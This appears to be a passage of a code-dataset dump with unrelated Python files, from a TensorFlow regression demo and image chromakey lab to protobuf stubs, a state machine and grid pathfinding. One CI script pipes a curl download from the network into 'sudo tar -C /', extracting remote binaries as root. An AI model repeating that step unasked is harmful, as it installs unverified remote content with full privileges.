using tensorflow\nW = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\nb = tf.Variable(tf.zeros([1]))\ny = W * x_data + b\n\n# set cost function, optimizer and train\nloss = tf.reduce_mean(tf.square(y - y_data))\noptimizer = tf.train.GradientDescentOptimizer(0.5)\ntrain = optimizer.minimize(loss)\n\n# initialize tensorflow variables\ninit = tf.initialize_all_variables()\nsess = tf.Session()\nsess.run(init)\n\n# display w and b combinations in the model\nfor step in range(16):\n sess.run(train)\n print(step, sess.run(W), sess.run(b))\n plt.plot(x_data, y_data, 'ro')\n plt.plot(x_data, sess.run(W) * x_data + sess.run(b))\n plt.xlabel('x')\n plt.xlim(-2,2)\n plt.ylim(0.1,0.6)\n plt.ylabel('y')\n plt.legend()\n plt.show()\n","sub_path":"linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"644487282","text":"# copy image to blank\r\ndef pyCopy(source, target, targetX, targetY):\r\n width = getWidth(source)\r\n height = getHeight(source)\r\n for x in range(0, width):\r\n for y in range(0, height):\r\n pix = getPixel(source, x, y)\r\n mypix = getPixel(target, targetX + x, targetY + y)\r\n setColor(mypix, getColor(pix))\r\n show(target)\r\n return target\r\n\r\n# get the picture in chromakey image to new image\r\ndef chromakey(pic, backgroundPicture):\r\n\r\n # get width of chromakey picture\r\n width = getWidth(pic)\r\n height = getHeight(pic)\r\n\r\n # loop \r\n for x in range(0, width):\r\n for y in range(0, height):\r\n\r\n # get color of rgb of chromakey picture\r\n red = getRed(getPixel(pic, x, y))\r\n green = getGreen(getPixel(pic, x, y))\r\n blue = getBlue(getPixel(pic, x, y))\r\n\r\n # conditional check for green to replace with pixel from backgroundPicture\r\n if green > 250 or (green > 225 and red > 0 and blue > 0 and red < 200 and blue < 200):\r\n setColor(getPixel(pic, x, y), getColor(getPixel(backgroundPicture, x, y)))\r\n elif green > 80 and red > 0 and red < 80 and blue > 0 and blue < 80:\r\n setColor(getPixel(pic, x, y), getColor(getPixel(backgroundPicture, x, y)))\r\n \r\n return pic\r\n\r\n# add text to picture at x and y\r\ndef addTextToPicture(picture):\r\n # text\r\n text = \"Happy Thanksgiving!\"\r\n # adding text to picture\r\n addTextWithStyle(picture, 200, 50, text, makeStyle(serif, bold, 50), makeColor(255, 165, 0))\r\n return picture\r\n\r\ndef makeThanksgivingCard():\r\n \r\n # make a blank picture of 852 by 480 pixels\r\n blankPaper = makeEmptyPicture(852, 480)\r\n\r\n # copy background into blank picture\r\n newImage = pyCopy(makePicture(pickAFile()), blankPaper, 0, 0)\r\n # adding chromakey into picture\r\n newImage = chromakey(makePicture(pickAFile()), newImage)\r\n newImage = chromakey(makePicture(pickAFile()), newImage)\r\n # adding text to picture\r\n newImage = addTextToPicture(newImage)\r\n\r\n # save picture to directory\r\n writePictureTo(newImage, 'C:/Users/lisec/OneDrive/Documents/CST 205/Lab 7/card.png')","sub_path":"CST205/Lab 7/Lab7.py","file_name":"Lab7.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"598745495","text":"#!/usr/bin/env python\n\nimport ci_lib\n\nbatches = [\n [\n 'docker pull %s' % (ci_lib.image_for_distro(ci_lib.DISTRO),),\n ],\n [\n 'curl https://dw.github.io/mitogen/binaries/ubuntu-python-2.4.6.tar.bz2 | sudo tar -C / -jxv',\n 
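# note: each inner list appears to form one batch of shell commands for ci_lib.run_batches below\n 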
]\n]\n\nci_lib.run_batches(batches)\n","sub_path":".ci/mitogen_py24_install.py","file_name":"mitogen_py24_install.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"130189451","text":"# Returns the margin to be used in \"character\"\n\n# length. 1 point = 1/72 inch\n\ndef CalculateMargin(inch_margin, point_size):\n\n return inch_margin * (72 // point_size)\n\n\n\n# Checks whether the word is at the end of a \n\n# sentence or not.\n\ndef _CheckWord(word):\n\n if (word.endswith('.') or word.endswith('?') or word.endswith('!')):\n\n return True\n\n else:\n\n return False\n\n\n\n# Handles outputting the line (that is taken \n\n# in as a list of split words). Returns the \n\n# char counter. \n\ndef HandleLine(line, char_count, char_limit, left_margin, output_file):\n\n for word in line:\n\n if (len(word) > char_limit):\n\n print(\"ERROR: WORD LENGTH MORE THAN MARGIN DEFINED.\")\n\n return -1\n\n if (char_count + len(word) > char_limit):\n\n print()\n\n output_file.write('\\n')\n\n for num_char in range(left_margin):\n\n print(' ', end='')\n\n output_file.write(' ')\n\n print(word, end='')\n\n output_file.write(word)\n\n print(' ', end='')\n\n output_file.write(' ')\n\n char_count = len(word) + 1\n\n else:\n\n print(word, end='')\n\n output_file.write(word)\n\n char_count += len(word)\n\n if (char_count + 1 > char_limit):\n\n print()\n\n output_file.write('\\n')\n\n for num_char in range(left_margin):\n\n print(' ', end='')\n\n output_file.write(' ')\n\n print(' ', end='')\n\n output_file.write(' ')\n\n char_count = 1\n\n else:\n\n print(' ', end='')\n\n output_file.write(' ')\n\n char_count += 1\n\n if (_CheckWord(word)):\n\n print(' ', end='')\n\n output_file.write(' ')\n\n char_count += 1\n\n return char_count\n","sub_path":"Prog1/margin_maker.py","file_name":"margin_maker.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"320613546","text":"import LEDBinCode\n\nimport sys\nimport os\nsys.path.append(os.path.abspath((os.path.join(os.path.dirname(__file__), \"../Observer_Observable/\"))))\nimport Observable\n\nclass LEDStock(Observable.Observable):\n\t\"\"\"A LED stock is a set of LED represented by their LED bin code.\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"Initialize the LED stock.\"\"\"\n\t\tsuper(LEDStock, self).__init__()\n\t\tself.stock = {}\n\t\tself.remaining = 0\n\n\tdef __repr__(self):\n\t\t\"\"\"Return a string formated representation of the LED stock.\"\"\"\n\t\tres = \"\\n\".format(self.remaining)\n\t\tfor key in self.stock.keys():\n\t\t\tres += \"{0} : {1}\\n\".format(key, self.stock[key])\n\t\treturn res + \"\"\n\n\tdef __getitem__(self, key):\n\t\t\"\"\"Get the number of LED having the same LED bin code.\"\"\"\n\t\tif not (isinstance(key, LEDBinCode.LEDBinCode)):\n\t\t\traise KeyError(\"Unsuported key type.\")\n\t\ttry:\n\t\t\treturn self.stock[key]\n\t\texcept KeyError:\n\t\t\treturn 0\n\n\tdef __setitem__(self, key, nb):\n\t\t\"\"\"Put some LED having the same LED bin code in the stock.\"\"\"\n\t\tif not (isinstance(key, LEDBinCode.LEDBinCode)):\n\t\t\traise KeyError(\"Unsuported key type.\")\n\t\tif not (isinstance(nb, int)):\n\t\t\traise TypeError(\"Unsuported right operand type.\")\n\t\tif (nb<0) :\n\t\t\traise ValueError(\"Unsuported negative value.\")\n\t\tself.remaining += (nb-self.stock[key] if (key in self) else nb)\n\t\tself.stock[key] = nb\n\n\tdef __contains__(self, 
bin):\n\t\t\"\"\"Check if the LED Bin already exists in the stock.\"\"\"\n\t\treturn bin in self.stock\n\n\tdef __iter__(self):\n\t\t\"\"\"Get the current iterator of led Dict\"\"\"\n\t\treturn self.stock.__iter__()\n\n\tdef __len__(self):\n\t\treturn len(self.stock)\n\n\tdef listBin(self):\n\t\t\"\"\"Returns all keys of stock\"\"\"\n\t\treturn self.stock.keys()\n\n\tdef copy(self):\n\t\t\"\"\"Create a copy of the LED Stock instance.\"\"\"\n\t\tres = LEDStock()\n\t\tres.stock = self.stock.copy()\n\t\tres.remaining = self.remaining\n\t\tres.observers = self.observers\n\t\treturn res\n\n\tdef getRemaining(self):\n\t\t\"\"\"Get the remaining LED stock size.\"\"\"\n\t\treturn self.remaining\n\n\tdef generateRandomStock(self, width):\n\t\t\"\"\"Generate a random stock of LED.\"\"\"\n\t\tself.stock.clear()\n\t\tself.remaining = width\n\t\tfor i in range(width):\n\t\t\trandomLEDBinCode = LEDBinCode.LEDBinCode.createRandomLEDBin()\n\t\t\tif randomLEDBinCode in self:\n\t\t\t\tself.stock[randomLEDBinCode] += 1\n\t\t\telse:\n\t\t\t\tself.stock[randomLEDBinCode] = 1\n\n\tdef pickOne(self, key):\n\t\t\"\"\"Remove a LED in the stock.\"\"\"\n\t\t# print(\"pickOne\")\n\t\tif not (isinstance(key,LEDBinCode.LEDBinCode)):\n\t\t\traise KeyError(\"Unsuported key type\")\n\t\tself[key] -= 1\n\t\tself.remaining -= 1\n\t\tif self[key]==0:\n\t\t\tself.stock.pop(key)\n\t\tself.notifyObservers(key)\n\n\tdef add(self, key):\n\t\t# print(\"add\")\n\t\tif not (isinstance(key,LEDBinCode.LEDBinCode)):\n\t\t\traise KeyError(\"Unsuported key type\")\n\t\ttry :\n\t\t\tself.stock[key] += 1\n\t\texcept KeyError:\n\t\t\tself.stock[key] = 1\n\t\tself.remaining += 1\n\t\tself.notifyObservers(key)","sub_path":"LED/Model/LEDStock.py","file_name":"LEDStock.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"243477106","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/postlund/pyatv_dev/pyatv/pyatv/mrp/protobuf/SendPackedVirtualTouchEventMessage_pb2.py\n# Compiled at: 2019-09-30 07:18:14\n# Size of source mod 2**32: 4740 bytes\nimport sys\n_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode('latin1'))\nfrom google.protobuf import descriptor as _descriptor\nfrom google.protobuf import message as _message\nfrom google.protobuf import reflection as _reflection\nfrom google.protobuf import symbol_database as _symbol_database\n_sym_db = _symbol_database.Default()\nfrom pyatv.mrp.protobuf import ProtocolMessage_pb2 as pyatv_dot_mrp_dot_protobuf_dot_ProtocolMessage__pb2\nDESCRIPTOR = _descriptor.FileDescriptor(name='pyatv/mrp/protobuf/SendPackedVirtualTouchEventMessage.proto',\n package='',\n syntax='proto2',\n serialized_options=None,\n serialized_pb=(_b('\\n;pyatv/mrp/protobuf/SendPackedVirtualTouchEventMessage.proto\\x1a(pyatv/mrp/protobuf/ProtocolMessage.proto\"{\\n\"SendPackedVirtualTouchEventMessage\\x12\\x0c\\n\\x04data\\x18\\x01 \\x01(\\x0c\"G\\n\\x05Phase\\x12\\t\\n\\x05Began\\x10\\x01\\x12\\t\\n\\x05Moved\\x10\\x02\\x12\\x0e\\n\\nStationary\\x10\\x03\\x12\\t\\n\\x05Ended\\x10\\x04\\x12\\r\\n\\tCancelled\\x10\\x05:a\\n\"sendPackedVirtualTouchEventMessage\\x12\\x10.ProtocolMessage\\x18/ \\x01(\\x0b2#.SendPackedVirtualTouchEventMessage')),\n dependencies=[\n pyatv_dot_mrp_dot_protobuf_dot_ProtocolMessage__pb2.DESCRIPTOR])\nSENDPACKEDVIRTUALTOUCHEVENTMESSAGE_FIELD_NUMBER = 
47\nsendPackedVirtualTouchEventMessage = _descriptor.FieldDescriptor(name='sendPackedVirtualTouchEventMessage',\n full_name='sendPackedVirtualTouchEventMessage',\n index=0,\n number=47,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=True,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR)\n_SENDPACKEDVIRTUALTOUCHEVENTMESSAGE_PHASE = _descriptor.EnumDescriptor(name='Phase',\n full_name='SendPackedVirtualTouchEventMessage.Phase',\n filename=None,\n file=DESCRIPTOR,\n values=[\n _descriptor.EnumValueDescriptor(name='Began',\n index=0,\n number=1,\n serialized_options=None,\n type=None),\n _descriptor.EnumValueDescriptor(name='Moved',\n index=1,\n number=2,\n serialized_options=None,\n type=None),\n _descriptor.EnumValueDescriptor(name='Stationary',\n index=2,\n number=3,\n serialized_options=None,\n type=None),\n _descriptor.EnumValueDescriptor(name='Ended',\n index=3,\n number=4,\n serialized_options=None,\n type=None),\n _descriptor.EnumValueDescriptor(name='Cancelled',\n index=4,\n number=5,\n serialized_options=None,\n type=None)],\n containing_type=None,\n serialized_options=None,\n serialized_start=157,\n serialized_end=228)\n_sym_db.RegisterEnumDescriptor(_SENDPACKEDVIRTUALTOUCHEVENTMESSAGE_PHASE)\n_SENDPACKEDVIRTUALTOUCHEVENTMESSAGE = _descriptor.Descriptor(name='SendPackedVirtualTouchEventMessage',\n full_name='SendPackedVirtualTouchEventMessage',\n filename=None,\n file=DESCRIPTOR,\n containing_type=None,\n fields=[\n _descriptor.FieldDescriptor(name='data',\n full_name='SendPackedVirtualTouchEventMessage.data',\n index=0,\n number=1,\n type=12,\n cpp_type=9,\n label=1,\n has_default_value=False,\n default_value=(_b('')),\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR)],\n extensions=[],\n nested_types=[],\n enum_types=[\n _SENDPACKEDVIRTUALTOUCHEVENTMESSAGE_PHASE],\n serialized_options=None,\n is_extendable=False,\n syntax='proto2',\n extension_ranges=[],\n oneofs=[],\n serialized_start=105,\n serialized_end=228)\n_SENDPACKEDVIRTUALTOUCHEVENTMESSAGE_PHASE.containing_type = _SENDPACKEDVIRTUALTOUCHEVENTMESSAGE\nDESCRIPTOR.message_types_by_name['SendPackedVirtualTouchEventMessage'] = _SENDPACKEDVIRTUALTOUCHEVENTMESSAGE\nDESCRIPTOR.extensions_by_name['sendPackedVirtualTouchEventMessage'] = sendPackedVirtualTouchEventMessage\n_sym_db.RegisterFileDescriptor(DESCRIPTOR)\nSendPackedVirtualTouchEventMessage = _reflection.GeneratedProtocolMessageType('SendPackedVirtualTouchEventMessage', (_message.Message,), {'DESCRIPTOR':_SENDPACKEDVIRTUALTOUCHEVENTMESSAGE, \n '__module__':'pyatv.mrp.protobuf.SendPackedVirtualTouchEventMessage_pb2'})\n_sym_db.RegisterMessage(SendPackedVirtualTouchEventMessage)\nsendPackedVirtualTouchEventMessage.message_type = _SENDPACKEDVIRTUALTOUCHEVENTMESSAGE\npyatv_dot_mrp_dot_protobuf_dot_ProtocolMessage__pb2.ProtocolMessage.RegisterExtension(sendPackedVirtualTouchEventMessage)","sub_path":"pycfiles/pyatv-0.5.1-py3-none-any/SendPackedVirtualTouchEventMessage_pb2.cpython-36.py","file_name":"SendPackedVirtualTouchEventMessage_pb2.cpython-36.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"199672484","text":"import requests\n\nfrom .url import URL\nfrom .payload import Payload\nfrom .result import Result\n\n\nclass Response:\n 
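# note: one static fetcher per retailer below; each is assumed to return a list of Result objects\n 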
@staticmethod\n def get_target(zip_code, product_body, range_mi, silent_fail):\n try:\n ret = []\n product_id, product_name = product_body\n\n response = requests.get(URL.get_target(zip_code, product_id, range_mi)).json()\n for location in response[\"products\"][0][\"locations\"]:\n ret.append(Result(\n name=location[\"store_name\"],\n product_name=product_name,\n amount=int(location[\"location_available_to_promise_quantity\"]),\n distance=float(location[\"distance\"]),\n address=location[\"store_address\"].replace(\"\\n\", \"\")\n ))\n\n return ret\n except Exception as e:\n if silent_fail:\n return []\n else:\n raise e\n\n @staticmethod\n def get_walgreens(zip_code, product_body, silent_fail):\n try:\n ret = []\n product_id, product_name = product_body\n\n response = requests.post(\n URL.post_walgreens(),\n data=Payload.get_walgreens(zip_code, product_id)).json()\n print(response[\"summary\"])\n for location in response[\"results\"]:\n store = location[\"store\"]\n address_body = store[\"address\"]\n\n ret.append(Result(\n name=f'{store[\"name\"]} #{location[\"storeNumber\"]}',\n product_name=product_name,\n amount=int(location[\"inventory\"][\"inventoryCount\"]),\n distance=float(location[\"distance\"]),\n address=f'{address_body[\"street\"]}, {address_body[\"state\"]} {address_body[\"zip\"]}',\n time=f'{store[\"storeOpenTime\"]}~{store[\"storeCloseTime\"]}'\n ))\n\n return ret\n except Exception as e:\n if silent_fail:\n return []\n else:\n raise e\n","sub_path":"extutils/maskfinder/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"16659959","text":"import numpy as np\nimport torch\n\n\ndef jacobian_in_batch(y, x):\n \"\"\" Computes the Jacobian matrix for batched data \"\"\"\n batch = y.shape[0]\n single_y_size = np.prod(y.shape[1:])\n y = y.view(batch, -1)\n vector = torch.ones(batch).to(y)\n\n jac = [\n torch.autograd.grad(\n y[:, i], x, grad_outputs=vector, retain_graph=True, create_graph=True\n )[0].view(batch, -1)\n for i in range(single_y_size)\n ]\n jac = torch.stack(jac, dim=1)\n\n return jac.detach()\n\n\ndef diagonal_hessian(y, xs):\n \"\"\" Determines the diagonal Hessian matrix, this isn't much faster then computing\n the full hessian but more memory efficient.\"\"\"\n assert y.numel() == 1\n if torch.is_tensor(xs):\n xs = [xs]\n diagonal_hessian = []\n # Compute hessian\n for x_i in xs:\n dx_i = torch.autograd.grad(y, x_i, create_graph=True)[0].flatten()\n ddx_i = torch.zeros(dx_i.numel())\n for i in range(x_i.numel()):\n ddx_ii = torch.autograd.grad(dx_i[i], x_i, retain_graph=True)[0].flatten()\n ddx_i[i] = ddx_ii[i].clone().detach()\n del ddx_ii\n diagonal_hessian += [ddx_i.reshape(x_i.shape)]\n del dx_i\n del ddx_i\n return diagonal_hessian\n\n\ndef block_diagonal_hessian(y, xs):\n \"\"\" Determines the block diagonal hessian.\"\"\"\n assert y.numel() == 1\n if torch.is_tensor(xs):\n xs = [xs]\n block_diagonal_hessian = []\n # Compute hessian\n for x_i in xs:\n dx_i = torch.autograd.grad(y, x_i, create_graph=True)[0].flatten()\n ddx_i = torch.zeros((dx_i.numel(), dx_i.numel()))\n for i in range(x_i.numel()):\n ddx_ii = torch.autograd.grad(dx_i[i], x_i, retain_graph=True)[0].flatten()\n ddx_i[i, :] = ddx_ii.clone().detach()\n del ddx_ii\n block_diagonal_hessian += [ddx_i]\n del dx_i\n del ddx_i\n return block_diagonal_hessian\n\n\ndef hessian(y, xs):\n \"\"\" Computes the full hessian matrix \"\"\"\n assert y.numel() == 1\n if 
torch.is_tensor(xs):\n xs = [xs]\n numel = sum([x.numel() for x in xs])\n hessian = torch.zeros((numel, numel))\n # Compute hessian\n row_idx = 0\n for i, x_i in enumerate(xs):\n dx_i = torch.autograd.grad(y, x_i, create_graph=True)[0].flatten()\n for j in range(x_i.numel()):\n ddx_ij = torch.autograd.grad(dx_i[j], xs[i:], retain_graph=True)\n ddx_ij = torch.cat([x.flatten() for x in ddx_ij])[j:]\n hessian[row_idx, row_idx:] += ddx_ij\n if row_idx + 1 < numel:\n hessian[row_idx + 1 :, row_idx] += ddx_ij[1:]\n del ddx_ij\n row_idx += 1\n del dx_i\n return hessian\n","sub_path":"pck1/sbi/vi/first_second_order_helpers.py","file_name":"first_second_order_helpers.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"419110315","text":"while True:\n four = input(\"Enter natural digits: \")\n if not four.isdigit() or int(four) < 0:\n print(\"Incorrect. Try again\")\n else:\n i = 1\n mul = int(four[0])\n while i < len(four):\n mul = mul*int(four[0+i])\n i = i + 1\n print(\"Mul: \",mul)\n print(\"Reverse: \",four[::-1])\n print(\"Sort: \",sorted(four))\n break","sub_path":"HW/HW2/HW_02_02.py","file_name":"HW_02_02.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"237876949","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 16 14:46:03 2017\n\n@author: Obelix\n\"\"\"\n\nimport os\nos.chdir(\"C:/Users/Obelix/Documents/Vachan_documents/Rosalind\")\n\nfile = open(\"rosalind_ini6.txt\", \"r\")\nline1 = file.readline().split()\nprint(line1)\nnu = 0;\ndict = {}\n\nfor word in line1:\n if word in dict:\n dict[word] += 1\n else:\n dict[word] = 1\n \nfor key, value in dict.items():\n print(key + str(\" \") + str(value))","sub_path":"Bioinformatics-Stronghold/untitled1.py","file_name":"untitled1.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"12839068","text":"from threading import Thread\nfrom ffmpy import FFmpeg\n\nimport mutagen\nfrom mutagen.oggvorbis import OggVorbis\nfrom mutagen.flac import FLAC\nfrom mutagen.mp3 import MP3\n\n\ndef _vorbis_tags(f):\n return {\n 'title': '; '.join(f.tags['title']),\n 'artist': '; '.join(f.tags['artist']),\n 'album': '; '.join(f.tags['album'])\n }\n\n\ndef _id3_tags(f):\n return {\n 'title': '; '.join(f.tags['TIT2']),\n 'artist': '; '.join(f.tags['TPE1']),\n 'album': '; '.join(f.tags['TALB'])\n }\n\n\nCODECS = {\n OggVorbis: _vorbis_tags,\n FLAC: _vorbis_tags,\n MP3: _id3_tags\n}\n\n\nclass IllegalCodecError(Exception):\n pass\n\n\ndef _get_tags(f):\n media_file = mutagen.File(str(f))\n codec = type(media_file)\n\n try:\n get_tags = CODECS[codec]\n except KeyError as e:\n raise IllegalCodecError from e\n else:\n tags = get_tags(media_file)\n\n return tags\n\n\ndef _run_ffmpeg(in_, out, exe='ffmpeg'):\n ff = FFmpeg(\n executable=exe,\n inputs={str(in_): None},\n outputs={str(out): [\n '-map', '0:0',\n '-f', 'ogg',\n '-c:a:0', 'libvorbis',\n '-q:a:0', '6'\n ]})\n ff.run()\n\n\ndef transcode(in_path, out_path, uuid, on_complete, delete=False):\n track = {uuid: _get_tags(in_path)}\n\n def worker():\n _run_ffmpeg(in_path, out_path)\n\n if delete:\n in_path.unlink()\n\n on_complete(track)\n\n t = Thread(target=worker)\n 
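# run ffmpeg on a background thread; the worker invokes on_complete(track) when finished\n 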
t.start()\n","sub_path":"airhead/transcoder.py","file_name":"transcoder.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"450842782","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Wei, Shuowen\n\nhttps://leetcode.com/problems/minimum-ascii-delete-sum-for-two-strings/\n\nhttps://labuladong.gitee.io/algo/3/24/78/\nhttps://mp.weixin.qq.com/s/ZhPEchewfc03xWv9VP3msg\n\nLC53, LC1143, LC583, LC712, LC72, LC516\n\"\"\"\nclass Solution(object):\n def minimumDeleteSum(self, s1, s2):\n \"\"\"\n :type s1: str\n :type s2: str\n :rtype: int\n \"\"\"\n dp_table = {}\n # Definition: dp(s1, i, s2, j) is the minimum sum of deleted ASCII codes needed to make s1[i..] and s2[j..] identical.\n def dp(s1, s2, i, j):\n if i == len(s1):\n return sum([ord(s2[k]) for k in range(j, len(s2))])\n if j == len(s2):\n return sum([ord(s1[k]) for k in range(i, len(s1))])\n if (i, j) in dp_table:\n return dp_table[(i,j)]\n \n if s1[i] == s2[j]:\n res = dp(s1, s2, i+1, j+1)\n else:\n res = min(dp(s1, s2, i, j+1) + ord(s2[j]), \n dp(s1, s2, i+1, j) + ord(s1[i]))\n dp_table[(i, j)] = res\n return res\n return dp(s1, s2, 0, 0)","sub_path":"Medium/LC712.py","file_name":"LC712.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"84902421","text":"#!/usr/bin/python3\n# To run from pkg root\n# python3 -m pkg.tools.edit_tag\n\nimport argparse\nimport codecs\nfrom datetime import datetime\nimport os\nimport shutil\nimport tempfile\n\nfrom pkg.common import util\n\nparser = argparse.ArgumentParser()\nparser.add_argument('workdir')\nparser.add_argument('oldtag')\nparser.add_argument('newtag')\nparser.add_argument('--safe', help='Only print expected changes.',\n action='store_true')\nargs = parser.parse_args()\n\nworkdir = os.path.join(os.getcwd(), args.workdir)\nprint('Running in %ssafe mode' % ('' if args.safe else 'un'))\nprint('Replacing %s tag with %s tag in %s' % (args.oldtag, args.newtag,\n workdir))\nfor (dirpath, dirnames, filenames) in os.walk(workdir):\n for note_file in filenames:\n note_file_path = os.path.join(dirpath, note_file)\n changed = False\n temp_handle, temp_file_path = tempfile.mkstemp()\n temp_file = os.fdopen(temp_handle, 'w')\n if not util.is_note_file(note_file):\n continue\n with codecs.open(note_file_path, 'r', 'utf-8') as curr_file:\n for line in curr_file:\n tag = util.search_tag(line)\n if tag == args.oldtag:\n temp_file.write(util.get_tag(args.newtag) + '\\n')\n changed = True\n else:\n temp_file.write(line)\n temp_file.close()\n if changed:\n print('Copying over %s' % (note_file_path))\n if not args.safe:\n shutil.copy(temp_file_path, note_file_path)\n # Have to do our own cleanup\n os.remove(temp_file_path)\n","sub_path":"pkg/tools/edit_tag.py","file_name":"edit_tag.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}{"seq_id":"150530688","text":"class StateMachine:\n # states: list containing all possible states\n # transitions: list containing all possible transitions\n # initialState: str equal to key of starting state\n def __init__(self,states,transitions,initialState):\n self.oldStateName = \"None\"\n self.currentStateName = initialState\n self.states = {}\n for state in states:\n self.states[state.name] = state\n self.transitions = {}\n for transition in transitions:\n self.transitions[transition.name] = transition\n \n def __call__(self):\n 
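# one tick of the machine: evaluate transitions first, then run the active state's loop\n 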
self.checkTransitions()\n self.run()\n \n # This method should be called continuously in a loop\n def run(self):\n currentState = self.states[self.currentStateName]\n # Run current State's loop function, if it exists\n if callable(currentState.loop): currentState.loop()\n\n # This method should be called continuously in a loop\n # checks if each transition's trigger is true. If so, checks if the current\n # state is in its list of source states. If so, changes state to the corresponding\n # target state\n def checkTransitions(self):\n for transition in self.transitions:\n currentTransition = self.transitions[transition]\n if currentTransition.checkTrigger():\n for index,source in enumerate(currentTransition.sourceStates):\n if self.currentStateName == source.name:\n self.changeState(currentTransition.targetStates[index])\n break\n\n # call leave function, if any, switch to new State, call enter function, if any\n def changeState(self,newState):\n oldState = self.states[self.currentStateName]\n if callable(oldState.leave): oldState.leave()\n self.oldStateName = oldState.name\n self.currentStateName = newState.name\n \n newState = self.states[self.currentStateName]\n if callable(newState.enter): newState.enter()\n\n\nclass State:\n # name: str name of State\n # loop: func to run continuously while in given state\n # enter: func to run once upon entering state\n # leave: func to run once upon leaving state\n def __init__(self,name,loop=None,enter=None,leave=None):\n self.name = name\n self.loop = loop\n self.enter = enter\n self.leave = leave\n\n\nclass Transition:\n # name: str name of Transition\n # trigger: func to trigger transition. Should return Bool\n # sources: list of source State objects\n # targets: list of target State objects\n # sources and targets should be lists of equal size. 
elements that share an\n # index represent a source-destination pair\n def __init__(self, name,trigger,sources,targets):\n self.name = name\n self.getTrigger = trigger\n self.sourceStates = sources\n self.targetStates = targets\n\n def checkTrigger(self):\n return self.getTrigger()","sub_path":"stateMachine.py","file_name":"stateMachine.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"401694157","text":"from random import randrange\nfrom heapq import heappop, heappush\nfrom math import inf\n\ndirections = [\"U\", \"D\", \"L\", \"R\"]\n\ndef new_position_after_move(i, j, move):\n explore_i = i\n explore_j = j\n if move == \"U\":\n explore_i = i - 1\n elif move == \"D\":\n explore_i = i + 1\n elif move == \"L\":\n explore_j = j - 1\n elif move == \"R\":\n explore_j = j + 1\n return explore_i, explore_j\n\ndef bfs(grid, start_i, start_j, swags):\n grid_copy = [row[:] for row in grid]\n bfs_queue = [[start_i, start_j]]\n paths_and_swags = []\n for i in range(len(grid)):\n row = []\n for j in range(len(grid[0])):\n row.append([[ \"(\" + str(i) + \",\" + str(j) + \")\"], []])\n paths_and_swags.append(row)\n\n count = 0;\n while bfs_queue:\n i,j = bfs_queue.pop(0)\n grid_copy[i][j] = \"visited\"\n for direction in directions:\n explore_i, explore_j = new_position_after_move(i, j, direction)\n\n if is_out_of_grid(grid, explore_i, explore_j):\n continue\n elif is_this_cell_available(grid, grid_copy, explore_i, explore_j):\n new_paths = paths_and_swags[i][j][0] + [ \"(\" + str(explore_i) + \",\" + str(explore_j) + \")\" ]\n new_swags = paths_and_swags[i][j][1]\n\n if grid[explore_i][explore_j] in swags:\n item = grid[explore_i][explore_j]\n new_swags = paths_and_swags[i][j][1] + [ str(item)]\n\n paths_and_swags[explore_i][explore_j][0] = new_paths\n paths_and_swags[explore_i][explore_j][1] = new_swags\n bfs_queue.append([explore_i, explore_j])\n count += 1\n\n grid[i][j] = \"end\"\n return paths_and_swags, count\n\ndef dijkstras( grid, start_i, start_j):\n grid_copy = [row[:] for row in grid]\n paths_and_distances = []\n for i in range(len(grid)):\n row = []\n for j in range(len(grid[0])):\n row.append([inf, [ \"(\" + str(i) + \",\" + str(j) + \")\"]])\n paths_and_distances.append(row)\n paths_and_distances[start_i][start_j][0] = 0\n vertices_to_explore = [(0, start_i, start_j)]\n count = 0;\n\n while vertices_to_explore:\n current_distance, current_i, current_j = heappop(vertices_to_explore)\n grid_copy[current_i][current_j] = \"visited\"\n for direction in directions:\n explore_i, explore_j = new_position_after_move(current_i, current_j, direction)\n new_distance = current_distance + 1\n new_path = paths_and_distances[current_i][current_j][1] + [ \"(\" + str(explore_i) + \",\" + str(explore_j) + \")\" ]\n\n if is_out_of_grid(grid, explore_i, explore_j):\n continue\n elif is_this_cell_available(grid, grid_copy, explore_i, 